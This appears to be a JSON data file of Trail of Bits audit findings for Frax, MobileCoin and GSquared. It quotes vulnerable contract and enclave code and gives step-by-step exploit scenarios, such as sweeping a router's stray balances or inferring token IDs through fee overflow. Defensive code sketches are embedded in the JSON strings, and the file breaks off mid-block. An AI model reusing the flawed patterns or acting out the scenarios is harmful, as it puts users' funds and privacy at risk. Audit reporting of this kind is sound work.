Univ3LiquidityAMO defaults the price of collateral to $1 ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/FraxQ42021.pdf", + "body": "The Uniswap V3 AMOs default to a price of $1 unless an oracle is set, and it is not clear whether an oracle is or will be set. If the contract lacks an oracle, the contract will return the number of collateral units instead of the price of collateral, meaning that it will value each unit of collateral at $1 instead of the correct price. While this may not be an issue for stablecoins, this pattern is error-prone and unclear. It could introduce errors in the global collateral value of FRAX since the protocol may underestimate (or overestimate) the value of the collateral if the price is above (or below) $1. col_bal_e18 is the balance, not the price, of the tokens. When collatDolarValue is called without an oracle, the contract falls back to valuing each token at $1. function freeColDolVal() public view returns (uint256) { uint256 value_tally_e18 = 0; for (uint i = 0; i < collateral_addresses.length; i++) { ERC20 thisCollateral = ERC20(collateral_addresses[i]); uint256 missing_decs = uint256(18).sub(thisCollateral.decimals()); uint256 col_bal_e18 = thisCollateral.balanceOf(address(this)).mul(10 ** missing_decs); uint256 col_usd_value_e18 = collatDolarValue(oracles[collateral_addresses[i]], col_bal_e18); value_tally_e18 = value_tally_e18.add(col_usd_value_e18); } return value_tally_e18; } Figure 17.1: contracts/Misc_AMOs/UniV3LiquidityAMO_V2.sol#L161-L171 function collatDolarValue(OracleLike oracle, uint256 balance) public view returns (uint256) { if (address(oracle) == address(0)) return balance; return balance.mul(oracle.read()).div(1 ether); } Figure 17.2: contracts/Misc_AMOs/UniV3LiquidityAMO_V2.sol#L174-L177 Exploit Scenario The value of a collateral token is $0.50. Instead of incentivizing recollateralization, the protocol indicates that it is adequately collateralized (or overcollateralized). However, the price of the collateral token is half the $1 default value, and the protocol needs to respond to the insufficient collateral backing FRAX. Recommendations Short term, integrate the Uniswap V3 AMOs properly with an oracle, and remove the hard-coded price assumptions. Long term, review and test the effect of each pricing function on the global collateral value and ensure that the protocol responds correctly to changes in collateralization. 18. calc_withdraw_one_coin is vulnerable to manipulation Severity: High Difficulty: High Type: Data Validation Finding ID: TOB-FRSOL-018 Target: MIM_Convex_AMO.sol", + "labels": [ + "Trail of Bits", + "Severity: Medium", + "Difficulty: Medium" + ] + }, + { + "title": "25. Setting collateral values manually is error-prone ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/FraxQ42021.pdf", + "body": "During the audit, the Frax Solidity team indicated that collateral located on non-mainnet chains is included in FRAX.globalCollateralValue in FRAXStablecoin, the Ethereum mainnet contract. (As indicated in TOB-FRSOL-023, this collateral cannot currently be redeemed by users.) Using a script, the team aggregates collateral prices from across multiple chains and contracts and then posts that data to ManualTokenTrackerAMO by calling setDollarBalances. Since we did not have the opportunity to review the script and these contracts were out of scope, we cannot speak to the security of this area of the system. 
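Because consumers cannot verify the posted data, on-chain guards can at least bound the damage of a bad update. A minimal sketch (hypothetical contract; the staleness and change limits are assumptions, not the ManualTokenTrackerAMO code):

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

/// Hypothetical sketch: manually posted balances carry a timestamp and are
/// rejected by consumers once stale, and each update is bounded so a
/// scripting error cannot move the reported value arbitrarily.
contract ManualBalanceGuard {
    address public immutable poster;
    uint256 public collatDollarBalance;
    uint256 public lastUpdate;
    uint256 public constant MAX_STALENESS = 1 days;   // assumed limit
    uint256 public constant MAX_CHANGE_BPS = 2_000;   // assumed limit: 20%

    constructor(address _poster) { poster = _poster; }

    function setDollarBalance(uint256 newBalance) external {
        require(msg.sender == poster, "not poster");
        uint256 old = collatDollarBalance;
        if (old != 0) {
            uint256 delta = newBalance > old ? newBalance - old : old - newBalance;
            require(delta * 10_000 <= old * MAX_CHANGE_BPS, "implausible jump");
        }
        collatDollarBalance = newBalance;
        lastUpdate = block.timestamp;
    }

    /// Consumers read through this view instead of the raw value.
    function freshBalance() external view returns (uint256) {
        require(block.timestamp - lastUpdate <= MAX_STALENESS, "stale data");
        return collatDollarBalance;
    }
}
```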
Other issues with collateral accounting and pricing indicate that this process needs review. Furthermore, considering the following issues, this privileged role and architecture significantly increase the attack surface of the protocol and the likelihood of a hazard: The correctness of the script used to calculate the data has not been reviewed, and users cannot audit or verify this data for themselves. The configuration of the Frax Protocol is highly complex, and we are not aware of how these interactions are tracked. It is possible that collateral can be mistakenly counted more than once or not at all. The reliability of the script and the frequency with which it is run are unknown. In times of market volatility, it is not clear whether the script will function as anticipated and be able to post updates to the mainnet. This role is not explained in the documentation or contracts, and it is not clear what guarantees users have regarding the collateralization of FRAX (i.e., what is included and updated). As of December 20, 2021, collatDollarBalance has not been updated since November 13, 2021, and is equivalent to fraxDollarBalanceStored. This indicates that FRAX.globalCollateralValue is both out of date and incorrectly counts FRAX as collateral (see TOB-FRSOL-024). Recommendations Short term, include only collateral that can be valued natively on the Ethereum mainnet and do not include collateral that cannot be redeemed in FRAX.globalCollateralValue. Long term, document and follow rigorous processes that limit risk and provide confidence to users. A. Vulnerability Categories The following tables describe the vulnerability categories, severity levels, and difficulty levels used in this document.", + "labels": [ + "Trail of Bits", + "Severity: High", + "Difficulty: Low" + ] + }, + { + "title": "1. Project contains vulnerable dependencies ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-07-mobilecoin-securityreview.pdf", + "body": "Running cargo-audit over the codebase revealed that the system under audit uses crates with Rust Security (RustSec) advisories and crates that are no longer maintained.", + "labels": [ + "Trail of Bits", + "Severity: Undetermined", + "Difficulty: High" + ] + }, + { + "title": "2. MobileCoin Foundation could infer token IDs in certain scenarios ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-07-mobilecoin-securityreview.pdf", + "body": "The MobileCoin Foundation is the recipient of all transaction fees and, in certain scenarios, could infer the token ID used in one of multiple transactions included in a block. MCIP-0025 introduced the concept of confidential token IDs. The rationale behind the proposal is to allow the MobileCoin network to support tokens other than MOB (MobileCoin's native token) in the future. Doing so requires not only that these tokens be unequivocally identifiable but also that transactions involving any token, MOB or otherwise, have the same confidentiality properties. Before the introduction of the confidential tokens feature, all transaction fees were aggregated by the enclave, which created a single transaction fee output per block; however, the same approach applied to a system that supports transfers of tokens other than MOB could introduce information leakage risks. 
For example, if two users submit two transactions with the same token ID, there would be a single transaction fee output, and therefore, both users would know that they transacted with the same token. To prevent such a leak of information, MCIP-0025 proposes the following: The number of transaction fee outputs on a block should always equal the minimum value between the number of token IDs and the number of transactions in that block (e.g., num_tx_fee_out = min(num_token_ids, num_transactions)). This essentially means that a block with a single transaction will still have a single transaction fee output, but a block with multiple transactions with the same token ID will have multiple transaction fee outputs, one with the aggregated fee and the others with a zero-value fee. Finally, it is worth mentioning that transaction fees are not paid in MOB but in the token that is being transacted; this creates a better user experience, as users do not need to own MOB to send tokens to other people. While this proposal does indeed preserve the confidentiality requirement, it falls short in one respect: the receiver of all transaction fees in the MobileCoin network is the MobileCoin Foundation, meaning that it will always know the token ID corresponding to a transaction fee output. Therefore, if only a single token is used in a block, the foundation will know the token ID used by all of the transactions in that block. Exploit Scenario Alice and Bob use the MobileCoin network to make payments between them. They send each other multiple payments, using the same token, and their transactions are included in a single block. Eve, who has access to the MobileCoin Foundation's viewing key, is able to decrypt the transaction fee outputs corresponding to that block and, because no other token was used inside the block, is able to infer the token that Alice and Bob used to make the payments. Recommendations Short term, document the fact that transaction token IDs are visible to the MobileCoin Foundation. Transparency on this issue will help users understand the information that is visible to some parties. Additionally, consider implementing the following alternative designs: Require that all transaction fees be paid in MOB. This solution would result in a degraded user experience compared to the current design; however, it would address the issue at hand. Aggregate fee outputs across multiple blocks. This solution would achieve only probabilistic confidentiality of information because if all those blocks transact in the same token, the foundation would still be able to infer the ID. Long term, document the trade-offs between allowing users to pay fees in the tokens they transact with and restricting fee payments to only MOB, and document how these trade-offs could affect the confidentiality of the system.", + "labels": [ + "Trail of Bits", + "Severity: Informational", + "Difficulty: High" + ] + }, + { + "title": "3. Token IDs are protected only by SGX ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-07-mobilecoin-securityreview.pdf", + "body": "Token IDs are intended to be confidential. However, they are operated on within an SGX enclave. This is an apparent departure from MobileCoin's previous approach of using SGX as an additional security mechanism, not a primary one. Previously, most confidential information in MobileCoin was protected by SGX and another security mechanism. 
Examples include the following: A transaction's senders, recipients, and amounts are protected by SGX and ring signatures. The transactions a user interacts with through Fog are protected by both SGX and oblivious RAM. However, token IDs are protected by SGX alone. (An example in which a token ID is operated on within an enclave appears in figure 3.1.) Thus, the incorporation of confidential tokens seems to represent a shift in MobileCoin's security posture. let token_id = TokenId::from(tx.prefix.fee_token_id); let minimum_fee = ct_min_fees .get(&token_id) .ok_or(TransactionValidationError::TokenNotYetConfigured)?; Figure 3.1: consensus/enclave/impl/src/lib.rs#L239-L243 Exploit Scenario Mallory learns of a vulnerability that allows her to see inside of an SGX enclave. Mallory uses the vulnerability to observe the token IDs used in transactions in a MobileCoin enclave that she runs. Recommendations Short term, document the fact that token IDs are not offered the same level of security as other aspects of MobileCoin. This will help set users' expectations regarding the confidentiality of their information (i.e., whether it could be revealed to an attacker). Long term, continue to investigate solutions to the security problems surrounding the confidential tokens feature. A solution that does not reveal token IDs to the enclave could exist.", + "labels": [ + "Trail of Bits", + "Severity: Informational", + "Difficulty: High" + ] + }, + { + "title": "4. Nonces are not stored per token ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-07-mobilecoin-securityreview.pdf", + "body": "Mint and mint configuration transaction nonces are not distinguished by the tokens with which they are associated. Malicious minters or governors could use this fact to conduct denial-of-service attacks against other minters and governors. The relevant code appears in figures 4.1 and 4.2. For each type of transaction, nonces are inserted into a seen_nonces set without regard to the token indicated in the transaction. let mut seen_nonces = BTreeSet::default(); let mut validated_txs = Vec::with_capacity(mint_config_txs.len()); for tx in mint_config_txs { // Ensure all nonces are unique. if !seen_nonces.insert(tx.prefix.nonce.clone()) { return Err(Error::FormBlock(format!( \"Duplicate MintConfigTx nonce: {:?}\", tx.prefix.nonce ))); } Figure 4.1: consensus/enclave/impl/src/lib.rs#L342-L352 let mut mint_txs = Vec::with_capacity(mint_txs_with_config.len()); let mut seen_nonces = BTreeSet::default(); for (mint_tx, mint_config_tx, mint_config) in mint_txs_with_config { // The nonce should be unique. if !seen_nonces.insert(mint_tx.prefix.nonce.clone()) { return Err(Error::FormBlock(format!( \"Duplicate MintTx nonce: {:?}\", mint_tx.prefix.nonce ))); } Figure 4.2: consensus/enclave/impl/src/lib.rs#L384-L393 Note that the described attack could be made worse by how nonces are intended to be used. The following passage from the white paper suggests that nonces are generated deterministically from public data. Generating nonces in this way could make them easy for an attacker to predict. When submitting a MintTx, we include a nonce to protect against replay attacks, and a tombstone block to prevent the transaction from being nominated indefinitely, and these are committed to the chain. (For example, in a bridge application, this nonce may be derived from records on the source chain, to ensure that each deposit on the source chain leads to at most one mint.) 
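A Solidity analogy of the per-token nonce recommendation (MobileCoin itself is written in Rust; all names here are illustrative): keying the seen-nonce set by token ID means a nonce consumed for one token cannot invalidate a transaction for another.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

/// Illustrative sketch, not MobileCoin code: nonces are tracked per token,
/// so Mallory burning a nonce under token A has no effect on token B.
contract PerTokenNonces {
    // tokenId => nonce => already used?
    mapping(uint64 => mapping(bytes32 => bool)) private seen;

    function consumeNonce(uint64 tokenId, bytes32 nonce) external {
        require(!seen[tokenId][nonce], "duplicate nonce for this token");
        seen[tokenId][nonce] = true;
    }
}
```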
Exploit Scenario Mallory (a minter) learns that Alice (another minter) intends to submit a mint transaction with a particular nonce. Mallory submits a mint transaction with that nonce first, making Alice's invalid. Recommendations Short term, store nonces per token, instead of all together. Doing so will prevent the denial-of-service attack described above. Long term, when adding new data to blocks or to the blockchain configuration, carefully consider whether it should be stored per token. Doing so could help to prevent denial-of-service attacks.", + "labels": [ + "Trail of Bits", + "Severity: Low", + "Difficulty: High" + ] + }, + { + "title": "5. Clients have no option for verifying blockchain conguration ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-07-mobilecoin-securityreview.pdf", + "body": "Clients have no way to verify whether the MobileCoin node they connect to is using the correct blockchain configuration. This exposes users to attacks, as detailed in the white paper: Similarly to how the nodes ensure that they are similarly configured during attestation (by mixing a hash of their configuration into the responder id used during attestation), the peer-to-node attestation channels could also do this, so that users can fail to attest immediately if malicious manipulation of configuration has occurred. The problem with this approach is that the users have no particularly good source of truth around the correct runtime configuration of the services. The problem that users have no particularly good source of truth could be solved by publishing the latest blockchain configuration via a separate channel (e.g., a publicly accessible server). Furthermore, allowing users to opt in to such additional checks would provide additional security to users who desire it. Exploit Scenario Alice falls victim to the attack described in the white paper. The attack would have been thwarted had Alice known that the node she connected to was not using the correct blockchain configuration. Recommendations Short term, make the current blockchain configuration publicly available, and allow nodes to attest to clients using their configuration. Doing so will help security-conscious users to better protect themselves. Long term, avoid withholding data from clients during attestation. Adopt a general principle that if data should be included in node-to-node attestation, then it should be included in node-to-client attestation as well. Doing so will help to ensure the security of users.", + "labels": [ + "Trail of Bits", + "Severity: Informational", + "Difficulty: High" + ] + }, + { + "title": "6. Confidential tokens cannot support frequent price swings ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-07-mobilecoin-securityreview.pdf", + "body": "The method for determining tokens' minimum fees has limited applicability. In particular, it cannot support tokens whose prices change frequently. In principle, a token's minimum fee should be comparable in value to the MOB minimum fee. Thus, if a token's price increases relative to the price of MOB, the token's minimum fee should decrease. Similarly, if a token's price decreases relative to the price of MOB, the token's minimum fee should increase. However, an enclave sets its fee map from the blockchain configuration during initialization (figure 6.1) and does not change the fee map thereafter. Thus, the enclave would seem to have to be restarted if its blockchain configuration and fee map were to change. 
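A sketch of the kind of updatable minimum-fee registry this finding implies is missing (illustrative Solidity, not MobileCoin's Rust enclave code):

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

/// Illustrative sketch: a minimum-fee registry that a governance key can
/// update at runtime, so fees can track token prices without restarting
/// the service that reads them.
contract UpdatableFeeMap {
    address public immutable governor;
    mapping(uint64 => uint256) public minFee; // tokenId => minimum fee

    event MinFeeSet(uint64 indexed tokenId, uint256 fee);

    constructor(address _governor) { governor = _governor; }

    function setMinFee(uint64 tokenId, uint256 fee) external {
        require(msg.sender == governor, "not governor");
        require(fee > 0, "fee must be positive");
        minFee[tokenId] = fee;
        emit MinFeeSet(tokenId, fee);
    }
}
```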
The need for a restart implies that the current setup cannot support tokens whose prices shift frequently. fn enclave_init( &self, peer_self_id: &ResponderId, client_self_id: &ResponderId, sealed_key: &Option, blockchain_config: BlockchainConfig, ) -> Result<(SealedBlockSigningKey, Vec)> { // Check that fee map is actually well formed FeeMap::is_valid_map(blockchain_config.fee_map.as_ref()).map_err(Error::FeeMap)?; // Validate governors signature. if !blockchain_config.governors_map.is_empty() { let signature = blockchain_config .governors_signature .ok_or(Error::MissingGovernorsSignature)?; let minting_trust_root_public_key = Ed25519Public::try_from(&MINTING_TRUST_ROOT_PUBLIC_KEY[..]) .map_err(Error::ParseMintingTrustRootPublicKey)?; minting_trust_root_public_key .verify_governors_map(&blockchain_config.governors_map, &signature) .map_err(|_| Error::InvalidGovernorsSignature)?; } self.ct_min_fee_map .set(Box::new( blockchain_config.fee_map.as_ref().iter().collect(), )) .expect(\"enclave was already initialized\"); Figure 6.1: consensus/enclave/impl/src/lib.rs#L454-L483 Exploit Scenario MobileCoin integrates token T. The value of T decreases, but the minimum fee remains the same. Users pay the minimum fee, resulting in lost income to the MobileCoin Foundation. Recommendations Short term, accept only tokens with a history of price stability. Doing so will ensure that the new features are used only with tokens that can be supported. Long term, consider including two inputs in each transaction, one for the token transferred and one to pay the fee in MOB, as suggested in TOB-MCCT-2.", + "labels": [ + "Trail of Bits", + "Severity: Informational", + "Difficulty: High" + ] + }, + { + "title": "7. Overflow handling could allow recovery of transaction token ID ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-07-mobilecoin-securityreview.pdf", + "body": "The system's fee calculation could overflow a u64 value. When this occurs, the fee is divided up into multiple smaller fees, each fitting into a u64 value. Under certain conditions, this behavior could be abused to reveal whether a token ID is used in a block. The relevant code appears in figure 7.1. The hypothetical attack is described in the exploit scenario below. loop { let output_fee = min(total_fee, u64::MAX as u128) as u64; outputs.push(mint_output( config.block_version, &fee_recipient, FEES_OUTPUT_PRIVATE_KEY_DOMAIN_TAG.as_bytes(), parent_block, &transactions, Amount { value: output_fee, token_id, }, outputs.len(), )); total_fee -= output_fee as u128; if total_fee == 0 { break; } } Figure 7.1: consensus/enclave/impl/src/lib.rs#L855-L873 Exploit Scenario Mallory is a (malicious) minter of token T. Suppose B is a recently minted block whose total number of fee outputs is equal to the number of tokens, which is less than the number of transactions in B. Further suppose that Mallory wishes to determine whether B contains a transaction involving T. Mallory does the following: 1. She puts her node into its state just prior to the minting of B. 2. She mints to herself a quantity of T worth u64::MAX / min_fee * min_fee. Call this quantity F. 3. She submits to her node a transaction with a fee of F. 4. She allows the block to be minted. 5. She observes the number of fee outputs in the modified block, B′: a. If B does not contain a transaction involving T, then B contains a fee output for T equal to zero, and B′ contains a fee output for T equal to F. 
b. If B does contain a transaction involving T, then B contains a fee output for T equal to at least min_fee, and B′ contains two fee outputs for T, one of which is equal to u64::MAX. Thus, by observing the number of outputs in B′, Mallory can determine whether B contains a transaction involving T. Recommendations Short term, require the total supply of all incorporated tokens not to exceed a u64 value. Doing so will eliminate the possibility of overflow and prevent the attack described above. Long term, consider incorporating randomness into the number of fee outputs generated. This could provide an alternative means of preventing the attack in a way that still allows for overflow. Alternatively, consider including two inputs in each transaction, one for the token transferred and one to pay the fee in MOB, as suggested in TOB-MCCT-2.", + "labels": [ + "Trail of Bits", + "Severity: Medium", + "Difficulty: High" + ] + }, + { + "title": "1. Unbounded loop can cause denial of service ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-10-GSquared-securityreview.pdf", + "body": "Under certain conditions, the withdrawal code will loop forever, permanently blocking users from getting their funds. The beforeWithdraw function runs before any withdrawal to ensure that the vault has sufficient assets. If the vault reserves are insufficient to cover the withdrawal, it loops over each strategy, incrementing the _strategyId pointer value with each iteration, and withdrawing assets to cover the withdrawal amount. function beforeWithdraw(uint256 _assets, ERC20 _token) internal returns (uint256) { // If reserves dont cover the withdrawal, start withdrawing from strategies if (_assets > _token.balanceOf(address(this))) { uint48 _strategyId = strategyQueue.head; while (true) { address _strategy = nodes[_strategyId].strategy; uint256 vaultBalance = _token.balanceOf(address(this)); // break if we have withdrawn all we need if (_assets <= vaultBalance) break; uint256 amountNeeded = _assets - vaultBalance; StrategyParams storage _strategyData = strategies[_strategy]; amountNeeded = Math.min(amountNeeded, _strategyData.totalDebt); // If nothing is needed or strategy has no assets, continue if (amountNeeded == 0) { continue; } Figure 1.1: The beforeWithdraw function in GVault.sol#L643-662 However, during an iteration, if the vault raises enough assets that the amount needed by the vault becomes zero or that the current strategy no longer has assets, the loop would keep using the same strategyId until the transaction runs out of gas and fails, blocking the withdrawal. Exploit Scenario Alice tries to withdraw funds from the protocol. The contract may be in a state that sets the conditions for the internal loop to run indefinitely, resulting in the waste of all sent gas, the failure of the transaction, and the blocking of all withdrawal requests. Recommendations Short term, add logic to increment the _strategyId variable to point to the next strategy in the StrategyQueue before the continue statement. Long term, use unit tests and fuzzing tools like Echidna to test that the protocol works as expected, even for edge cases.", + "labels": [ + "Trail of Bits", + "Severity: High", + "Difficulty: Low" + ] + }, + { + "title": "2. 
Lack of two-step process for contract ownership changes ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-10-GSquared-securityreview.pdf", + "body": "The setOwner() function is used to change the owner of the PnLFixedRate contract. Transferring ownership in one function call is error-prone and could result in irrevocable mistakes. function setOwner(address _owner) external { if (msg.sender != owner) revert PnLErrors.NotOwner(); address previous_owner = msg.sender; owner = _owner; emit LogOwnershipTransferred(previous_owner, _owner); } Figure 2.1: contracts/pnl/PnLFixedRate:56-62 This issue can also be found in the following locations: contracts/pnl/PnL.sol:36-42 contracts/strategy/ConvexStrategy.sol:447-453 contracts/strategy/keeper/GStrategyGuard.sol:92-97 contracts/strategy/stop-loss/StopLossLogic.sol:73-78 Exploit Scenario The owner of the PnLFixedRate contract is a governance-controlled multisignature wallet. The community agrees to change the owner of the strategy, but the wrong address is mistakenly provided to its call to setOwner, permanently misconfiguring the system. Recommendations Short term, implement a two-step process to transfer contract ownership, in which the owner proposes a new address and then the new address executes a call to accept the role, completing the transfer. Long term, review how critical operations are implemented across the codebase to make sure they are not error-prone.", + "labels": [ + "Trail of Bits", + "Severity: Informational", + "Difficulty: High" + ] + }, + { + "title": "3. Non-zero token balances in the GRouter can be stolen ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-10-GSquared-securityreview.pdf", + "body": "A non-zero balance of 3CRV, DAI, USDC, or USDT in the router contract can be stolen by an attacker. The GRouter contract is the entrypoint for deposits into a tranche and withdrawals out of a tranche. A deposit involves depositing a given amount of a supported stablecoin (USDC, DAI, or USDT); converting the deposit, through a series of operations, into G3CRV, the protocol's ERC4626-compatible vault token; and depositing the G3CRV into a tranche. Similarly, for withdrawals, the user burns their G3CRV that was in the tranche and, after a series of operations, receives back some amount of a supported stablecoin (figure 3.1). 
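Figure 3.1 below shows the current withdrawal path. For contrast, a minimal sketch of the pre/post-balance accounting recommended for this finding (hypothetical helper, not GRouter code):

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

interface IERC20 {
    function balanceOf(address) external view returns (uint256);
    function transfer(address, uint256) external returns (bool);
}

/// Hypothetical helper, not GRouter code: measure the token balance before
/// and after the swap and forward only the newly received amount, so tokens
/// already sitting in the contract cannot be swept by the caller.
abstract contract BalanceDeltaSketch {
    function _withdrawExact(IERC20 token, address to, uint256 minOut) internal {
        uint256 before = token.balanceOf(address(this));
        _removeLiquidity(); // the remove_liquidity_one_coin step, abstracted
        uint256 received = token.balanceOf(address(this)) - before;
        require(received >= minOut, "LTMinAmountExpected");
        // send only the delta, never the contract's full balance
        require(token.transfer(to, received), "transfer failed");
    }

    function _removeLiquidity() internal virtual;
}
```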
function withdrawFromTrancheForCaller( uint256 _amount, uint256 _token_index, bool _tranche, uint256 _minAmount ) internal returns (uint256 amount) { ERC20(address(tranche.getTrancheToken(_tranche))).safeTransferFrom( msg.sender, address(this), _amount ); // withdraw from tranche // index is zero for ETH mainnet as their is just one yield token // returns usd value of withdrawal (uint256 vaultTokenBalance, ) = tranche.withdraw( _amount, 0, _tranche, address(this) ); // withdraw underlying from GVault uint256 underlying = vaultToken.redeem( vaultTokenBalance, address(this), address(this) ); // remove liquidity from 3crv to get desired stable from curve threePool.remove_liquidity_one_coin( underlying, int128(uint128(_token_index)), //value should always be 0,1,2 0 ); ERC20 stableToken = ERC20(routerOracle.getToken(_token_index)); amount = stableToken.balanceOf(address(this)); if (amount < _minAmount) { revert Errors.LTMinAmountExpected(); } // send stable to user stableToken.safeTransfer(msg.sender, amount); emit LogWithdrawal(msg.sender, _amount, _token_index, _tranche, amount); } Figure 3.1: The withdrawFromTrancheForCaller function in GRouter.sol#L421-468 However, notice that during withdrawals the amount of stableTokens that will be transferred back to the user is a function of the current stableToken balance of the contract (see the highlighted line in figure 3.1). In the expected case, the balance should be only the tokens received from the threePool.remove_liquidity_one_coin swap (figure 3.1). However, a non-zero balance could also occur if a user airdrops some tokens or transfers tokens by mistake instead of calling the expected deposit or withdraw functions. As long as the attacker has at least 1 wei of G3CRV to burn, they are capable of withdrawing the whole balance of stableToken from the contract, regardless of how much was received as part of the threePool swap. A similar situation can happen with deposits. A non-zero balance of G3CRV can be stolen as long as the attacker has at least 1 wei of either DAI, USDC, or USDT. Exploit Scenario Alice mistakenly sends a large amount of DAI to the GRouter contract instead of calling the deposit function. Eve notices that the GRouter contract has a non-zero balance of DAI and calls withdraw with a negligible balance of G3CRV. Eve is able to steal Alice's DAI at a very small cost. Recommendations Short term, consider using the difference between the contract's pre- and post-balance of stableToken for withdrawals, and depositAmount for deposits, in order to ensure that only the newly received tokens are used for the operations. Long term, create an external skim function that can be used to skim any excess tokens in the contract. Additionally, ensure that the user documentation highlights that users should not transfer tokens directly to the GRouter and should instead use the web interface or call the deposit and withdraw functions. Finally, ensure that token airdrops or unexpected transfers can only benefit the protocol.", + "labels": [ + "Trail of Bits", + "Severity: Informational", + "Difficulty: Medium" + ] + }, + { + "title": "4. 
Uninformative implementation of maxDeposit and maxMint from EIP-4626 ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-10-GSquared-securityreview.pdf", + "body": "The GVault implementation of EIP-4626 is uninformative for maxDeposit and maxMint, as they return only fixed, extreme values. EIP-4626 is a standard to implement tokenized vaults. In particular, the following is specified: maxDeposit: MUST factor in both global and user-specific limits, like if deposits are entirely disabled (even temporarily) it MUST return 0. MUST return 2 ** 256 - 1 if there is no limit on the maximum amount of assets that may be deposited. maxMint: MUST factor in both global and user-specific limits, like if mints are entirely disabled (even temporarily) it MUST return 0. MUST return 2 ** 256 - 1 if there is no limit on the maximum amount of assets that may be deposited. The current implementation of maxDeposit and maxMint in the GVault contract directly return the maximum value of the uint256 type: /// @notice The maximum amount a user can deposit into the vault function maxDeposit(address) public pure override returns (uint256 maxAssets) { return type(uint256).max; } . . . /// @notice maximum number of shares that can be minted function maxMint(address) public pure override returns (uint256 maxShares) { return type(uint256).max; } Figure 4.1: The maxDeposit and maxMint functions from GVault.sol This implementation, however, does not provide any valuable information to the user and may lead to faulty integrations with third-party systems. Exploit Scenario A third-party protocol wants to deposit into a GVault. It first calls maxDeposit to know the maximum amount of assets it can deposit and then calls deposit. However, the latter function call will revert because the value is too large. Recommendations Short term, return suitable values in maxDeposit and maxMint by considering the amount of assets owned by the caller as well as any other global condition (e.g., a contract is paused). Long term, ensure compliance with the EIP specification that is being implemented (in this case, EIP-4626).", + "labels": [ + "Trail of Bits", + "Severity: Informational", + "Difficulty: High" + ] + }, + { + "title": "5. moveStrategy runs out of gas for large inputs ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-10-GSquared-securityreview.pdf", + "body": "Reordering strategies can trigger operations that will run out of gas before completion. A GVault contract allows different strategies to be added into a queue. Since their order is important, the contract provides moveStrategy, a function that lets the owner move a strategy to a certain position in the queue. 
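For finding 4 above, a sketch of maxDeposit and maxMint variants that return informative limits; the paused flag and depositCap are assumptions for illustration, not actual GVault state:

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

/// Sketch for finding 4: EIP-4626 limit views that reflect real conditions.
/// `paused` and `depositCap` are assumed fields, not GVault's actual state.
abstract contract InformativeLimits {
    bool public paused;
    uint256 public depositCap; // 0 means "no cap"
    uint256 public totalManagedAssets;

    function maxDeposit(address) public view returns (uint256) {
        if (paused) return 0; // EIP-4626: MUST return 0 when deposits disabled
        if (depositCap == 0) return type(uint256).max;
        uint256 used = totalManagedAssets;
        return used >= depositCap ? 0 : depositCap - used;
    }

    function maxMint(address receiver) public view returns (uint256) {
        uint256 assets = maxDeposit(receiver);
        // avoid overflowing the share conversion when there is no cap
        return assets == type(uint256).max ? assets : convertToShares(assets);
    }

    function convertToShares(uint256 assets) public view virtual returns (uint256);
}
```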
/// @notice Move the strategy to a new position /// @param _strategy Target strategy to move /// @param _pos desired position of strategy /// @dev if the _pos value is >= number of strategies in the queue, /// the strategy will be moved to the tail position function moveStrategy(address _strategy, uint256 _pos) external onlyOwner { uint256 currentPos = getStrategyPositions(_strategy); uint256 _strategyId = strategyId[_strategy]; if (currentPos > _pos) move(uint48(_strategyId), uint48(currentPos - _pos), false); else move(uint48(_strategyId), uint48(_pos - currentPos), true); } Figure 5.1: The moveStrategy function from GVault.sol The documentation states that if the position to move a certain strategy is larger than the number of strategies in the queue, then it will be moved to the tail of the queue. This is implemented using the move function: /// @notice move a strategy to a new position in the queue /// @param _id id of strategy to move /// @param _steps number of steps to move the strategy /// @param _back move towards tail (true) or head (false) /// @dev Moves a strategy a given number of steps. If the number /// of steps exceeds the position of the head/tail, the /// strategy will take the place of the current head/tail function move(uint48 _id, uint48 _steps, bool _back) internal { Strategy storage oldPos = nodes[_id]; if (_steps == 0) return; if (oldPos.strategy == ZERO_ADDRESS) revert NoIdEntry(_id); uint48 _newPos = !_back ? oldPos.prev : oldPos.next; for (uint256 i = 1; i < _steps; i++) { _newPos = !_back ? nodes[_newPos].prev : nodes[_newPos].next; } Figure 5.2: The header of the move function from StrategyQueue.sol However, if a large number of steps is used, the loop will never finish without running out of gas. A similar issue affects StrategyQueue.withdrawalQueue, if called directly. Exploit Scenario Alice creates a smart contract that acts as the owner of a GVault. She includes code to reorder strategies using a call to moveStrategy. Since she wants to ensure that a certain strategy is always moved to the end of the queue, she uses a very large value as the position. When the code runs, it will always run out of gas, blocking the operation. Recommendations Short term, ensure that the execution of move ends within a number of steps bounded by the number of strategies in the queue. Long term, use unit tests and fuzzing tools like Echidna to test that the protocol works as expected, even for edge cases.", + "labels": [ + "Trail of Bits", + "Severity: Informational", + "Difficulty: High" + ] + }, + { + "title": "6. GVault withdrawals from ConvexStrategy are vulnerable to sandwich attacks ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-10-GSquared-securityreview.pdf", + "body": "Token swaps that may be executed during vault withdrawals are vulnerable to sandwich attacks. Note that this is applicable only if a user withdraws directly from the GVault, not through the GRouter contract. The ConvexStrategy contract performs token swaps through Uniswap V2, Uniswap V3, and Curve. All platforms allow the caller to specify the minimum-amount-out value, which indicates the minimum amount of tokens that a user wishes to receive from a swap. This provides protection against illiquid pools and sandwich attacks. 
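A sketch of deriving such a minimum-amount-out floor from an expected quote and a basis-point tolerance, rather than hardcoding zero (illustrative library, not ConvexStrategy code):

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

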